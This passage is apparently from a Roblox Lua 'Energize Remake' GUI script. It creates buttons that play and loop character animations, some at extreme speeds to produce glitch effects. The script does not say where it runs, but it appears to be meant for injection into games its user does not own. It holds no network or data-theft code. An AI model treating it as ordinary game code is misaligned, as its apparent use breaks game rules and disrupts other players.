0, 30) 512 | SuperFaint.Font = Enum.Font.SourceSansSemibold 513 | SuperFaint.Text = "Super Faint" 514 | SuperFaint.TextColor3 = Color3.new(1, 1, 1) 515 | SuperFaint.TextSize = 15 516 | 517 | FloatSit.Name = "FloatSit" 518 | FloatSit.Parent = ScrollingFrame 519 | FloatSit.BackgroundColor3 = Color3.new(0, 0, 0) 520 | FloatSit.BackgroundTransparency = 0.30000001192093 521 | FloatSit.Position = UDim2.new(0.492957741, 0, 0.888975561, 0) 522 | FloatSit.Size = UDim2.new(0, 90, 0, 30) 523 | FloatSit.Font = Enum.Font.SourceSansSemibold 524 | FloatSit.Text = "FloatSit" 525 | FloatSit.TextColor3 = Color3.new(1, 1, 1) 526 | FloatSit.TextSize = 15 527 | 528 | BowDown.Name = "BowDown" 529 | BowDown.Parent = ScrollingFrame 530 | BowDown.BackgroundColor3 = Color3.new(0, 0, 0) 531 | BowDown.BackgroundTransparency = 0.30000001192093 532 | BowDown.Position = UDim2.new(0.713614941, 0, 0.888975561, 0) 533 | BowDown.Size = UDim2.new(0, 90, 0, 30) 534 | BowDown.Font = Enum.Font.SourceSansSemibold 535 | BowDown.Text = "Bow Down" 536 | BowDown.TextColor3 = Color3.new(1, 1, 1) 537 | BowDown.TextSize = 15 538 | 539 | ScrollingFrameR15.Name = "ScrollingFrameR15" 540 | ScrollingFrameR15.Parent = MainFrame 541 | ScrollingFrameR15.BackgroundColor3 = Color3.new(0, 0, 0) 542 | ScrollingFrameR15.BackgroundTransparency = 0.60000002384186 543 | ScrollingFrameR15.Position = UDim2.new(-0.00150352798, 0, 0.0951187983, 0) 544 | ScrollingFrameR15.Size = UDim2.new(0, 427, 0, 207) 545 | ScrollingFrameR15.CanvasSize = UDim2.new(0, 0, 0.430000007, 0) 546 | ScrollingFrameR15.ScrollBarThickness = 10 547 | 548 | FloatSlash.Name = "FloatSlash" 549 | FloatSlash.Parent = ScrollingFrameR15 550 | FloatSlash.BackgroundColor3 = Color3.new(0, 0, 0) 551 | FloatSlash.BackgroundTransparency = 0.30000001192093 552 | FloatSlash.Position = UDim2.new(0.0563380271, 0, 0.0405257866, 0) 553 | FloatSlash.Size = UDim2.new(0, 90, 0, 30) 554 | FloatSlash.Font = Enum.Font.SourceSansSemibold 555 | FloatSlash.Text = "Float Slash" 556 | FloatSlash.TextColor3 = Color3.new(1, 1, 1) 557 | FloatSlash.TextSize = 15 558 | 559 | ArmsOut.Name = "ArmsOut" 560 | ArmsOut.Parent = ScrollingFrameR15 561 | ArmsOut.BackgroundColor3 = Color3.new(0, 0, 0) 562 | ArmsOut.BackgroundTransparency = 0.30000001192093 563 | ArmsOut.Position = UDim2.new(0.28169015, 0, 0.0405257866, 0) 564 | ArmsOut.Size = UDim2.new(0, 90, 0, 30) 565 | ArmsOut.Font = Enum.Font.SourceSansSemibold 566 | ArmsOut.Text = " Arms Out" 567 | ArmsOut.TextColor3 = Color3.new(1, 1, 1) 568 | ArmsOut.TextSize = 15 569 | 570 | DownSlash.Name = "DownSlash" 571 | DownSlash.Parent = ScrollingFrameR15 572 | DownSlash.BackgroundColor3 = Color3.new(0, 0, 0) 573 | DownSlash.BackgroundTransparency = 0.30000001192093 574 | DownSlash.Position = UDim2.new(0.507042229, 0, 0.0405257866, 0) 575 | DownSlash.Size = UDim2.new(0, 90, 0, 30) 576 | DownSlash.Font = Enum.Font.SourceSansSemibold 577 | DownSlash.Text = "Down Slash" 578 | DownSlash.TextColor3 = Color3.new(1, 1, 1) 579 | DownSlash.TextSize = 15 580 | 581 | R15Spinner.Name = "R15Spinner" 582 | R15Spinner.Parent = ScrollingFrameR15 583 | R15Spinner.BackgroundColor3 = Color3.new(0, 0, 0) 584 | R15Spinner.BackgroundTransparency = 0.30000001192093 585 | R15Spinner.Position = UDim2.new(0.732394338, 0, 0.0405257866, 0) 586 | R15Spinner.Size = UDim2.new(0, 90, 0, 30) 587 | R15Spinner.Font = Enum.Font.SourceSansSemibold 588 | R15Spinner.Text = "Spinner" 589 | R15Spinner.TextColor3 = Color3.new(1, 1, 1) 590 | R15Spinner.TextSize = 15 591 | 592 | WeirdZombie.Name = "WeirdZombie" 593 | WeirdZombie.Parent = ScrollingFrameR15 594 | WeirdZombie.BackgroundColor3 = Color3.new(0, 0, 0) 595 | WeirdZombie.BackgroundTransparency = 0.30000001192093 596 | WeirdZombie.Position = UDim2.new(0.28169015, 0, 0.213602722, 0) 597 | WeirdZombie.Size = UDim2.new(0, 90, 0, 30) 598 | WeirdZombie.Font = Enum.Font.SourceSansSemibold 599 | WeirdZombie.Text = "Weird Zombie" 600 | WeirdZombie.TextColor3 = Color3.new(1, 1, 1) 601 | WeirdZombie.TextSize = 15 602 | 603 | CrazySlash.Name = "CrazySlash" 604 | CrazySlash.Parent = ScrollingFrameR15 605 | CrazySlash.BackgroundColor3 = Color3.new(0, 0, 0) 606 | CrazySlash.BackgroundTransparency = 0.30000001192093 607 | CrazySlash.Position = UDim2.new(0.0563380271, 0, 0.213602722, 0) 608 | CrazySlash.Size = UDim2.new(0, 90, 0, 30) 609 | CrazySlash.Font = Enum.Font.SourceSansSemibold 610 | CrazySlash.Text = "Crazy Slash" 611 | CrazySlash.TextColor3 = Color3.new(1, 1, 1) 612 | CrazySlash.TextSize = 15 613 | 614 | Pull.Name = "Pull" 615 | Pull.Parent = ScrollingFrameR15 616 | Pull.BackgroundColor3 = Color3.new(0, 0, 0) 617 | Pull.BackgroundTransparency = 0.30000001192093 618 | Pull.Position = UDim2.new(0.507042229, 0, 0.213602722, 0) 619 | Pull.Size = UDim2.new(0, 90, 0, 30) 620 | Pull.Font = Enum.Font.SourceSansSemibold 621 | Pull.Text = "Pull" 622 | Pull.TextColor3 = Color3.new(1, 1, 1) 623 | Pull.TextSize = 15 624 | 625 | Open.Name = "Open" 626 | Open.Parent = ScrollingFrameR15 627 | Open.BackgroundColor3 = Color3.new(0, 0, 0) 628 | Open.BackgroundTransparency = 0.30000001192093 629 | Open.Position = UDim2.new(0.732394338, 0, 0.213602722, 0) 630 | Open.Size = UDim2.new(0, 90, 0, 30) 631 | Open.Font = Enum.Font.SourceSansSemibold 632 | Open.Text = "Open" 633 | Open.TextColor3 = Color3.new(1, 1, 1) 634 | Open.TextSize = 15 635 | 636 | CircleArm.Name = "CircleArm" 637 | CircleArm.Parent = ScrollingFrameR15 638 | CircleArm.BackgroundColor3 = Color3.new(0, 0, 0) 639 | CircleArm.BackgroundTransparency = 0.30000001192093 640 | CircleArm.Position = UDim2.new(0.0563380271, 0, 0.386679649, 0) 641 | CircleArm.Size = UDim2.new(0, 90, 0, 30) 642 | CircleArm.Font = Enum.Font.SourceSansSemibold 643 | CircleArm.Text = "Circle Arm" 644 | CircleArm.TextColor3 = Color3.new(1, 1, 1) 645 | CircleArm.TextSize = 15 646 | 647 | Bend.Name = "Bend" 648 | Bend.Parent = ScrollingFrameR15 649 | Bend.BackgroundColor3 = Color3.new(0, 0, 0) 650 | Bend.BackgroundTransparency = 0.30000001192093 651 | Bend.Position = UDim2.new(0.28169015, 0, 0.386679649, 0) 652 | Bend.Size = UDim2.new(0, 90, 0, 30) 653 | Bend.Font = Enum.Font.SourceSansSemibold 654 | Bend.Text = "Bend" 655 | Bend.TextColor3 = Color3.new(1, 1, 1) 656 | Bend.TextSize = 15 657 | 658 | RotateSlash.Name = "RotateSlash" 659 | RotateSlash.Parent = ScrollingFrameR15 660 | RotateSlash.BackgroundColor3 = Color3.new(0, 0, 0) 661 | RotateSlash.BackgroundTransparency = 0.30000001192093 662 | RotateSlash.Position = UDim2.new(0.507042229, 0, 0.386679649, 0) 663 | RotateSlash.Size = UDim2.new(0, 90, 0, 30) 664 | RotateSlash.Font = Enum.Font.SourceSansSemibold 665 | RotateSlash.Text = "Rotate Slash" 666 | RotateSlash.TextColor3 = Color3.new(1, 1, 1) 667 | RotateSlash.TextSize = 15 668 | 669 | FlingArms.Name = "FlingArms" 670 | FlingArms.Parent = ScrollingFrameR15 671 | FlingArms.BackgroundColor3 = Color3.new(0, 0, 0) 672 | FlingArms.BackgroundTransparency = 0.30000001192093 673 | FlingArms.Position = UDim2.new(0.732394338, 0, 0.386679649, 0) 674 | FlingArms.Size = UDim2.new(0, 90, 0, 30) 675 | FlingArms.Font = Enum.Font.SourceSansSemibold 676 | FlingArms.Text = "Fling Arms" 677 | FlingArms.TextColor3 = Color3.new(1, 1, 1) 678 | FlingArms.TextSize = 15 679 | 680 | SideFrame.Name = "SideFrame" 681 | SideFrame.Active = true 682 | SideFrame.Draggable = true 683 | SideFrame.Visible = false 684 | SideFrame.Parent = Energize 685 | SideFrame.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) 686 | SideFrame.BackgroundTransparency = 0.15000000596046 687 | SideFrame.Position = UDim2.new(0.502199769, 0, 0.55104512, 0) 688 | SideFrame.Size = UDim2.new(0, 426, 0, 25) 689 | 690 | OpenGUI.Name = "OpenGUI" 691 | OpenGUI.Parent = SideFrame 692 | OpenGUI.BackgroundColor3 = Color3.new(0, 0, 0) 693 | OpenGUI.BackgroundTransparency = 0.15000000596046 694 | OpenGUI.BorderSizePixel = 0 695 | OpenGUI.Position = UDim2.new(0.967136145, 0, 0, 0) 696 | OpenGUI.Size = UDim2.new(0, 15, 0, 15) 697 | OpenGUI.Font = Enum.Font.SourceSansSemibold 698 | OpenGUI.Text = "X" 699 | OpenGUI.TextColor3 = Color3.new(1, 1, 1) 700 | OpenGUI.TextSize = 14 701 | 702 | SideFrameTitle.Name = "SideFrameTitle" 703 | SideFrameTitle.Parent = SideFrame 704 | SideFrameTitle.BackgroundColor3 = Color3.new(1, 1, 1) 705 | SideFrameTitle.BackgroundTransparency = 1 706 | SideFrameTitle.Position = UDim2.new(0.364739805, 0, 0, 0) 707 | SideFrameTitle.Size = UDim2.new(0, 115, 0, 25) 708 | SideFrameTitle.Font = Enum.Font.SourceSansSemibold 709 | SideFrameTitle.Text = "Energize Remake" 710 | SideFrameTitle.TextColor3 = Color3.new(1, 1, 1) 711 | SideFrameTitle.TextSize = 17 712 | -- Scripts: 713 | col = Color3.fromRGB(0, 0, 0) 714 | loc = Color3.fromRGB(255, 117, 19) 715 | rcol = Color3.fromRGB(0, 0, 0) 716 | rloc = Color3.fromRGB(255, 117, 19) 717 | 718 | CloseGUI.MouseButton1Click:connect(function() 719 | MainFrame.Visible = false 720 | SideFrame.Visible = true 721 | SideFrame.Position = MainFrame.Position 722 | end) 723 | 724 | OpenGUI.MouseButton1Click:connect(function() 725 | MainFrame.Visible = true 726 | SideFrame.Visible = false 727 | MainFrame.Position = SideFrame.Position 728 | end) 729 | 730 | if (game:GetService"Players".LocalPlayer.Character:WaitForChild("Humanoid").RigType == Enum.HumanoidRigType.R15) then 731 | ScrollingFrame.Visible = false 732 | ScrollingFrameR15.Visible = true 733 | CheckR.Text = "Showing R15 Animations" 734 | else 735 | ScrollingFrame.Visible = true 736 | ScrollingFrameR15.Visible = false 737 | CheckR.Text = "Showing R6 Animations" 738 | end 739 | 740 | local Anim = Instance.new("Animation") 741 | Anim.AnimationId = "rbxassetid://35154961" 742 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 743 | local HeadThrowACTIVE = false 744 | HeadThrow.MouseButton1Click:connect(function() 745 | HeadThrowACTIVE = not HeadThrowACTIVE 746 | if HeadThrowACTIVE then 747 | HeadThrow.BackgroundColor3 = loc 748 | while wait() do 749 | if track.IsPlaying == false then 750 | if HeadThrowACTIVE then 751 | track:Play(.1, 1, 1) 752 | end 753 | end 754 | end 755 | else 756 | track:Stop() 757 | HeadThrow.BackgroundColor3 = col 758 | end 759 | end) 760 | 761 | local Anim = Instance.new("Animation") 762 | Anim.AnimationId = "rbxassetid://121572214" 763 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 764 | local FloatingHeadACTIVE = false 765 | FloatingHead.MouseButton1Click:connect(function() 766 | FloatingHeadACTIVE = not FloatingHeadACTIVE 767 | if FloatingHeadACTIVE then 768 | track:Play(.1, 1, 1) 769 | FloatingHead.BackgroundColor3 = loc 770 | else 771 | track:Stop() 772 | FloatingHead.BackgroundColor3 = col 773 | end 774 | end) 775 | 776 | local Anim = Instance.new("Animation") 777 | Anim.AnimationId = "rbxassetid://182724289" 778 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 779 | local CrouchACTIVE = false 780 | Crouch.MouseButton1Click:connect(function() 781 | CrouchACTIVE = not CrouchACTIVE 782 | if CrouchACTIVE then 783 | track:Play(.1, 1, 1) 784 | Crouch.BackgroundColor3 = loc 785 | else 786 | track:Stop() 787 | Crouch.BackgroundColor3 = col 788 | end 789 | end) 790 | 791 | local Anim = Instance.new("Animation") 792 | Anim.AnimationId = "rbxassetid://282574440" 793 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 794 | local FloorCrawlACTIVE = false 795 | FloorCrawl.MouseButton1Click:connect(function() 796 | FloorCrawlACTIVE = not FloorCrawlACTIVE 797 | if FloorCrawlACTIVE then 798 | track:Play(.1, 1, 1) 799 | FloorCrawl.BackgroundColor3 = loc 800 | else 801 | track:Stop() 802 | FloorCrawl.BackgroundColor3 = col 803 | end 804 | end) 805 | 806 | local Anim = Instance.new("Animation") 807 | Anim.AnimationId = "rbxassetid://204328711" 808 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 809 | local DinoWalkACTIVE = false 810 | DinoWalk.MouseButton1Click:connect(function() 811 | DinoWalkACTIVE = not DinoWalkACTIVE 812 | if DinoWalkACTIVE then 813 | track:Play(.1, 1, 1) 814 | DinoWalk.BackgroundColor3 = loc 815 | else 816 | track:Stop() 817 | DinoWalk.BackgroundColor3 = col 818 | end 819 | end) 820 | 821 | local Anim = Instance.new("Animation") 822 | Anim.AnimationId = "rbxassetid://429681631" 823 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 824 | local JumpingJacksACTIVE = false 825 | JumpingJacks.MouseButton1Click:connect(function() 826 | JumpingJacksACTIVE = not JumpingJacksACTIVE 827 | if JumpingJacksACTIVE then 828 | track:Play(.1, 1, 1) 829 | JumpingJacks.BackgroundColor3 = loc 830 | else 831 | track:Stop() 832 | JumpingJacks.BackgroundColor3 = col 833 | end 834 | end) 835 | 836 | local Anim = Instance.new("Animation") 837 | Anim.AnimationId = "rbxassetid://35154961" 838 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 839 | local LoopHeadACTIVE = false 840 | LoopHead.MouseButton1Click:connect(function() 841 | LoopHeadACTIVE = not LoopHeadACTIVE 842 | if LoopHeadACTIVE then 843 | LoopHead.BackgroundColor3 = loc 844 | while wait() do 845 | if track.IsPlaying == false then 846 | if LoopHeadACTIVE then 847 | track:Play(.5, 1, 1e6) 848 | end 849 | end 850 | end 851 | else 852 | track:Stop() 853 | LoopHead.BackgroundColor3 = col 854 | end 855 | end) 856 | 857 | local Anim = Instance.new("Animation") 858 | Anim.AnimationId = "rbxassetid://184574340" 859 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 860 | local HeroJumpACTIVE = false 861 | HeroJump.MouseButton1Click:connect(function() 862 | HeroJumpACTIVE = not HeroJumpACTIVE 863 | if HeroJumpACTIVE then 864 | HeroJump.BackgroundColor3 = loc 865 | while wait() do 866 | if track.IsPlaying == false then 867 | if HeroJumpACTIVE then 868 | track:Play(.1, 1, 1) 869 | end 870 | end 871 | end 872 | else 873 | track:Stop() 874 | HeroJump.BackgroundColor3 = col 875 | end 876 | end) 877 | 878 | local Anim = Instance.new("Animation") 879 | Anim.AnimationId = "rbxassetid://181526230" 880 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 881 | local FaintACTIVE = false 882 | Faint.MouseButton1Click:connect(function() 883 | FaintACTIVE = not FaintACTIVE 884 | if FaintACTIVE then 885 | track:Play(.1, 1, 1) 886 | Faint.BackgroundColor3 = loc 887 | else 888 | track:Stop() 889 | Faint.BackgroundColor3 = col 890 | end 891 | end) 892 | 893 | local Anim = Instance.new("Animation") 894 | Anim.AnimationId = "rbxassetid://181525546" 895 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 896 | local FloorFaintACTIVE = false 897 | FloorFaint.MouseButton1Click:connect(function() 898 | FloorFaintACTIVE = not FloorFaintACTIVE 899 | if FloorFaintACTIVE then 900 | FloorFaint.BackgroundColor3 = loc 901 | while wait() do 902 | if track.IsPlaying == false then 903 | if FloorFaintACTIVE then 904 | track:Play(.1, 1, 2) 905 | end 906 | end 907 | end 908 | else 909 | track:Stop() 910 | FloorFaint.BackgroundColor3 = col 911 | end 912 | end) 913 | 914 | local Anim = Instance.new("Animation") 915 | Anim.AnimationId = "rbxassetid://181525546" 916 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 917 | local SuperFaintACTIVE = false 918 | SuperFaint.MouseButton1Click:connect(function() 919 | SuperFaintACTIVE = not SuperFaintACTIVE 920 | if SuperFaintACTIVE then 921 | SuperFaint.BackgroundColor3 = loc 922 | while wait() do 923 | if track.IsPlaying == false then 924 | if SuperFaintACTIVE then 925 | track:Play(.1, 0.5, 40) 926 | end 927 | end 928 | end 929 | else 930 | track:Stop() 931 | SuperFaint.BackgroundColor3 = col 932 | end 933 | end) 934 | 935 | local Anim = Instance.new("Animation") 936 | Anim.AnimationId = "rbxassetid://313762630" 937 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 938 | local LevitateACTIVE = false 939 | Levitate.MouseButton1Click:connect(function() 940 | LevitateACTIVE = not LevitateACTIVE 941 | if LevitateACTIVE then 942 | track:Play(.1, 1, 1) 943 | Levitate.BackgroundColor3 = loc 944 | else 945 | track:Stop() 946 | Levitate.BackgroundColor3 = col 947 | end 948 | end) 949 | 950 | local Anim = Instance.new("Animation") 951 | Anim.AnimationId = "rbxassetid://183412246" 952 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 953 | local DabACTIVE = false 954 | Dab.MouseButton1Click:connect(function() 955 | DabACTIVE = not DabACTIVE 956 | if DabACTIVE then 957 | Dab.BackgroundColor3 = loc 958 | while wait() do 959 | if track.IsPlaying == false then 960 | if DabACTIVE then 961 | track:Play(.1, 1, 1) 962 | end 963 | end 964 | end 965 | else 966 | track:Stop() 967 | Dab.BackgroundColor3 = col 968 | end 969 | end) 970 | 971 | local Anim = Instance.new("Animation") 972 | Anim.AnimationId = "rbxassetid://188632011" 973 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 974 | local SpinACTIVE = false 975 | Spinner.MouseButton1Click:connect(function() 976 | SpinACTIVE = not SpinACTIVE 977 | if SpinACTIVE then 978 | Spinner.BackgroundColor3 = loc 979 | while wait() do 980 | if track.IsPlaying == false then 981 | if SpinACTIVE then 982 | track:Play(.1, 1, 2) 983 | end 984 | end 985 | end 986 | else 987 | track:Stop() 988 | Spinner.BackgroundColor3 = col 989 | end 990 | end) 991 | 992 | local Anim = Instance.new("Animation") 993 | Anim.AnimationId = "rbxassetid://179224234" 994 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 995 | local FloatSitACTIVE = false 996 | FloatSit.MouseButton1Click:connect(function() 997 | FloatSitACTIVE = not FloatSitACTIVE 998 | if FloatSitACTIVE then 999 | track:Play(.1, 1, 1) 1000 | FloatSit.BackgroundColor3 = loc 1001 | else 1002 | track:Stop() 1003 | FloatSit.BackgroundColor3 = col 1004 | end 1005 | end) 1006 | 1007 | local Anim = Instance.new("Animation") 1008 | Anim.AnimationId = "rbxassetid://429703734" 1009 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1010 | local MovingDanceACTIVE = false 1011 | MovingDance.MouseButton1Click:connect(function() 1012 | MovingDanceACTIVE = not MovingDanceACTIVE 1013 | if MovingDanceACTIVE then 1014 | MovingDance.BackgroundColor3 = loc 1015 | while wait() do 1016 | if track.IsPlaying == false then 1017 | if MovingDanceACTIVE then 1018 | track:Play(.1, 1, 1) 1019 | end 1020 | end 1021 | end 1022 | else 1023 | track:Stop() 1024 | MovingDance.BackgroundColor3 = col 1025 | end 1026 | end) 1027 | 1028 | local Anim = Instance.new("Animation") 1029 | Anim.AnimationId = "rbxassetid://215384594" 1030 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1031 | local WeirdMoveACTIVE = false 1032 | WeirdMove.MouseButton1Click:connect(function() 1033 | WeirdMoveACTIVE = not WeirdMoveACTIVE 1034 | if WeirdMoveACTIVE then 1035 | track:Play(.1, 1, 1) 1036 | WeirdMove.BackgroundColor3 = loc 1037 | else 1038 | track:Stop() 1039 | WeirdMove.BackgroundColor3 = col 1040 | end 1041 | end) 1042 | 1043 | local Anim = Instance.new("Animation") 1044 | Anim.AnimationId = "rbxassetid://215384594" 1045 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1046 | local CloneIllusionACTIVE = false 1047 | CloneIllusion.MouseButton1Click:connect(function() 1048 | CloneIllusionACTIVE = not CloneIllusionACTIVE 1049 | if CloneIllusionACTIVE then 1050 | track:Play(.5, 1, 1e7) 1051 | CloneIllusion.BackgroundColor3 = loc 1052 | else 1053 | track:Stop() 1054 | CloneIllusion.BackgroundColor3 = col 1055 | end 1056 | end) 1057 | 1058 | local Anim = Instance.new("Animation") 1059 | Anim.AnimationId = "rbxassetid://313762630" 1060 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1061 | local GlitchLevitateACTIVE = false 1062 | GlitchLevitate.MouseButton1Click:connect(function() 1063 | GlitchLevitateACTIVE = not GlitchLevitateACTIVE 1064 | if GlitchLevitateACTIVE then 1065 | track:Play(.5, 1, 1e7) 1066 | GlitchLevitate.BackgroundColor3 = loc 1067 | else 1068 | track:Stop() 1069 | GlitchLevitate.BackgroundColor3 = col 1070 | end 1071 | end) 1072 | 1073 | local Anim = Instance.new("Animation") 1074 | Anim.AnimationId = "rbxassetid://429730430" 1075 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1076 | local SpinDanceACTIVE = false 1077 | SpinDance.MouseButton1Click:connect(function() 1078 | SpinDanceACTIVE = not SpinDanceACTIVE 1079 | if SpinDanceACTIVE then 1080 | SpinDance.BackgroundColor3 = loc 1081 | while wait() do 1082 | if track.IsPlaying == false then 1083 | if SpinDanceACTIVE then 1084 | track:Play(.1, 1, 1) 1085 | end 1086 | end 1087 | end 1088 | else 1089 | track:Stop() 1090 | SpinDance.BackgroundColor3 = col 1091 | end 1092 | end) 1093 | 1094 | local Anim = Instance.new("Animation") 1095 | Anim.AnimationId = "rbxassetid://45834924" 1096 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1097 | local MoonDanceACTIVE = false 1098 | MoonDance.MouseButton1Click:connect(function() 1099 | MoonDanceACTIVE = not MoonDanceACTIVE 1100 | if MoonDanceACTIVE then 1101 | MoonDance.BackgroundColor3 = loc 1102 | while wait() do 1103 | if track.IsPlaying == false then 1104 | if MoonDanceACTIVE then 1105 | track:Play(.1, 1, 1) 1106 | end 1107 | end 1108 | end 1109 | else 1110 | track:Stop() 1111 | MoonDance.BackgroundColor3 = col 1112 | end 1113 | end) 1114 | 1115 | local Anim = Instance.new("Animation") 1116 | Anim.AnimationId = "rbxassetid://204062532" 1117 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1118 | local FullPunchACTIVE = false 1119 | FullPunch.MouseButton1Click:connect(function() 1120 | FullPunchACTIVE = not FullPunchACTIVE 1121 | if FullPunchACTIVE then 1122 | FullPunch.BackgroundColor3 = loc 1123 | while wait() do 1124 | if track.IsPlaying == false then 1125 | if FullPunchACTIVE then 1126 | track:Play(.1, 1, 1) 1127 | end 1128 | end 1129 | end 1130 | else 1131 | track:Stop() 1132 | FullPunch.BackgroundColor3 = col 1133 | end 1134 | end) 1135 | 1136 | local Anim = Instance.new("Animation") 1137 | Anim.AnimationId = "rbxassetid://186934910" 1138 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1139 | local SpinDance2ACTIVE = false 1140 | SpinDance2.MouseButton1Click:connect(function() 1141 | SpinDance2ACTIVE = not SpinDance2ACTIVE 1142 | if SpinDance2ACTIVE then 1143 | SpinDance2.BackgroundColor3 = loc 1144 | while wait() do 1145 | if track.IsPlaying == false then 1146 | if SpinDance2ACTIVE then 1147 | track:Play(.1, 1, 1) 1148 | end 1149 | end 1150 | end 1151 | else 1152 | track:Stop() 1153 | SpinDance2.BackgroundColor3 = col 1154 | end 1155 | end) 1156 | 1157 | local Anim = Instance.new("Animation") 1158 | Anim.AnimationId = "rbxassetid://204292303" 1159 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1160 | local BowDownACTIVE = false 1161 | BowDown.MouseButton1Click:connect(function() 1162 | BowDownACTIVE = not BowDownACTIVE 1163 | if BowDownACTIVE then 1164 | BowDown.BackgroundColor3 = loc 1165 | while wait() do 1166 | if track.IsPlaying == false then 1167 | if BowDownACTIVE then 1168 | track:Play(.1, 1, 3) 1169 | end 1170 | end 1171 | end 1172 | else 1173 | track:Stop() 1174 | BowDown.BackgroundColor3 = col 1175 | end 1176 | end) 1177 | 1178 | local Anim = Instance.new("Animation") 1179 | Anim.AnimationId = "rbxassetid://204295235" 1180 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1181 | local SwordSlamACTIVE = false 1182 | SwordSlam.MouseButton1Click:connect(function() 1183 | SwordSlamACTIVE = not SwordSlamACTIVE 1184 | if SwordSlamACTIVE then 1185 | SwordSlam.BackgroundColor3 = loc 1186 | while wait() do 1187 | if track.IsPlaying == false then 1188 | if SwordSlamACTIVE then 1189 | track:Play(.1, 1, 1) 1190 | end 1191 | end 1192 | end 1193 | else 1194 | track:Stop() 1195 | SwordSlam.BackgroundColor3 = col 1196 | end 1197 | end) 1198 | 1199 | local Anim = Instance.new("Animation") 1200 | Anim.AnimationId = "rbxassetid://204295235" 1201 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1202 | local LoopSlamACTIVE = false 1203 | LoopSlam.MouseButton1Click:connect(function() 1204 | LoopSlamACTIVE = not LoopSlamACTIVE 1205 | if LoopSlamACTIVE then 1206 | LoopSlam.BackgroundColor3 = loc 1207 | while wait() do 1208 | if track.IsPlaying == false then 1209 | if LoopSlamACTIVE then 1210 | track:Play(.1, 1, 1e4) 1211 | end 1212 | end 1213 | end 1214 | else 1215 | track:Stop() 1216 | LoopSlam.BackgroundColor3 = col 1217 | end 1218 | end) 1219 | 1220 | local Anim = Instance.new("Animation") 1221 | Anim.AnimationId = "rbxassetid://184574340" 1222 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1223 | local MegaInsaneACTIVE = false 1224 | MegaInsane.MouseButton1Click:connect(function() 1225 | MegaInsaneACTIVE = not MegaInsaneACTIVE 1226 | if MegaInsaneACTIVE then 1227 | MegaInsane.BackgroundColor3 = loc 1228 | while wait() do 1229 | if track.IsPlaying == false then 1230 | if MegaInsaneACTIVE then 1231 | track:Play(.1, 0.5, 40) 1232 | end 1233 | end 1234 | end 1235 | else 1236 | track:Stop() 1237 | MegaInsane.BackgroundColor3 = col 1238 | end 1239 | end) 1240 | 1241 | local Anim = Instance.new("Animation") 1242 | Anim.AnimationId = "rbxassetid://126753849" 1243 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1244 | local SuperPunchACTIVE = false 1245 | SuperPunch.MouseButton1Click:connect(function() 1246 | SuperPunchACTIVE = not SuperPunchACTIVE 1247 | if SuperPunchACTIVE then 1248 | SuperPunch.BackgroundColor3 = loc 1249 | while wait() do 1250 | if track.IsPlaying == false then 1251 | if SuperPunchACTIVE then 1252 | track:Play(.1, 1, 3) 1253 | end 1254 | end 1255 | end 1256 | else 1257 | track:Stop() 1258 | SuperPunch.BackgroundColor3 = col 1259 | end 1260 | end) 1261 | 1262 | local Anim = Instance.new("Animation") 1263 | Anim.AnimationId = "rbxassetid://218504594" 1264 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1265 | local FullSwingACTIVE = false 1266 | FullSwing.MouseButton1Click:connect(function() 1267 | FullSwingACTIVE = not FullSwingACTIVE 1268 | if FullSwingACTIVE then 1269 | FullSwing.BackgroundColor3 = loc 1270 | while wait() do 1271 | if track.IsPlaying == false then 1272 | if FullSwingACTIVE then 1273 | track:Play(.1, 1, 1) 1274 | end 1275 | end 1276 | end 1277 | else 1278 | track:Stop() 1279 | FullSwing.BackgroundColor3 = col 1280 | end 1281 | end) 1282 | 1283 | local Anim = Instance.new("Animation") 1284 | Anim.AnimationId = "rbxassetid://259438880" 1285 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1286 | local ArmTurbineACTIVE = false 1287 | ArmTurbine.MouseButton1Click:connect(function() 1288 | ArmTurbineACTIVE = not ArmTurbineACTIVE 1289 | if ArmTurbineACTIVE then 1290 | track:Play(.1, 1, 1e3) 1291 | ArmTurbine.BackgroundColor3 = loc 1292 | else 1293 | track:Stop() 1294 | ArmTurbine.BackgroundColor3 = col 1295 | end 1296 | end) 1297 | 1298 | local Anim = Instance.new("Animation") 1299 | Anim.AnimationId = "rbxassetid://136801964" 1300 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1301 | local BarrelRollACTIVE = false 1302 | BarrelRoll.MouseButton1Click:connect(function() 1303 | BarrelRollACTIVE = not BarrelRollACTIVE 1304 | if 